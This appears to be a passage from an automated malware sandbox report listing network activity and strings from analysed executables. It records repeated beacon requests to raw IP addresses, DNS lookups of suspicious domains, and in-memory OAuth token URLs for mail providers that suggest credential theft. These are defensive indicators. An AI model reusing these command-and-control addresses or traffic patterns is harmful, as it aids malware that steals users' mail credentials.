                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f8d2a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c842a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c852a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c862a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c872a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c802a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c812a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c822a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c832a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c8c2a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c8d2a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d842a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d852a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d862a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d872a1cec7a86d87bdb6546ad12dac02909e91cd11729366be8e843a8ec4cda8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d393594cce723dfdde06 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 185.39.17.76
                    Source: global trafficHTTP traffic detected: GET /success?substr=two&s=uniq&sub=none HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: UHost: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: UHost: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: UHost: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: UHost: 185.156.73.98Connection: Keep-AliveCache-Control: no-cache
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: denied12157https://www.googleapis.com/oauth2/v4/tokenhttps://login.microsoftonline.com/common/oauth2/v2.0/tokenhttps://api.login.yahoo.com/oauth2/get_tokenhttps://api.login.aol.com/oauth2/get_tokenrefresh_token=&client_id=&client_secret=&scope=https%3A%2F%2Foutlook.office.com%2FIMAP.AccessAsUser.All%20https%3A%2F%2Foutlook.office.com%2FPOP.AccessAsUser.All%20https%3A%2F%2Foutlook.office.com%2FSMTP.Send%20offline_access&scope=https%3A%2F%2Foutlook.office.com%2FIMAP.AccessAsUser.All%20https%3A%2F%2Foutlook.office.com%2FSMTP.Send%20offline_access&grant_type=refresh_token&grant_type=authorization_code%s | %saccess_tokenrefresh_tokenexpires_inerrorerror_descriptionSuccess; expire: %dError: [%d] [%s] [%s] [%s]":}imap.googlemail.comgmail.comgooglemail.compop.gmail.compop.googlemail.comhotmail.comoutlook.comlive.commsn.comoutlook.office365.comyahoo.comimap.mail.yahoo.compop.mail.yahoo.comimap.aol.comimap.aim.compop.aol.compop.aim.comstate=%Y%m%d%H%S%u%ustateesumsoft.poppeeper\shell\open\commandPpHelper.exePpHelper.exe could not be found and is required to perform this action829 "PpHelper.exe could not update the necessary data equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: proenhann.digital
                    Source: global trafficDNS traffic detected: DNS query: h1.passionwhenever.shop
                    Source: global trafficDNS traffic detected: DNS query: microsoft-com.mail.protection.outlook.com
                    Source: global trafficDNS traffic detected: DNS query: quag.cn
                    Source: global trafficDNS traffic detected: DNS query: yahoo.com
                    Source: global trafficDNS traffic detected: DNS query: mta5.am0.yahoodns.net
                    Source: unknownHTTP traffic detected: POST /thnb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 47Host: proenhann.digital
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Apr 2025 15:03:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iWYX4948avOaBj6I9f6Gj%2F%2ByktnNAJ3ADRiCygz03ZBW1OXM%2BCz%2FU9J8yhkYoCm3TmBtsOvDrCRdqfBsCNbIsY1HaC7fOB8tBGzdGH6JX2nNvSkWuOy1TCvJWnUZZIObb0WpZJy%2F5%2BRT9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}speculation-rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 930c54f19c6f3789-MIA
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://127.0.0.1:%d/
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://127.0.0.1:%d/https://mail.google.com/https://accounts.google.com/o/oauth2/v2/auth&login_hint=
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/2
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/fons
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/info
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/ows
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/service
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/service=C:
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceFil
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceWo
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicedbM
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicehqos.dll.mui
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceicr
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicell
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceng(
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicengm
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/serviceoaming
                    Source: svchost015.exe, 00000001.00000002.1832671709.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/servicerogo
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/success?substr=two&s=uniq&sub=none
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/update
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.98/updateswsock.dll.mui
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 00000013.00000002.2219622501.0000000008907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: powershell.exe, 0000000B.00000002.1844484241.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1979002205.0000000005C89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2038386691.00000000039FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000003.1745495782.0000000003945000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000B.00000002.1785737784.0000000004E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1961124956.0000000004D3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 0000000B.00000002.1785737784.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1961124956.0000000004C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000B.00000002.1785737784.0000000004E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1961124956.0000000004D3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/productrequest/?product=ALL
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/faq/?q=ImapSync
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/plugins/
                    Source: svchost015.exe, 00000001.00000003.1706329291.0000000003A91000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.esumsoft.com/products/pop-peeper/plugins/#SSL
